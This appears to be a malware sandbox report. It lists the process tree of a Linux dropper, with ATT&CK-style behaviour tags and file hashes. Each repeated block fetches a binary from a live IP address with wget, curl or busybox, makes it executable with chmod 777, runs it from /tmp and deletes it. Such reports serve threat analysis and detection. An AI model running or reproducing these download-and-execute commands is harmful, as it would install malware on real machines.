/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:949
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:955
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:961
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:967
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:973
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:976
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:977
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:979
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:982
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:983
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:985
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:988
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97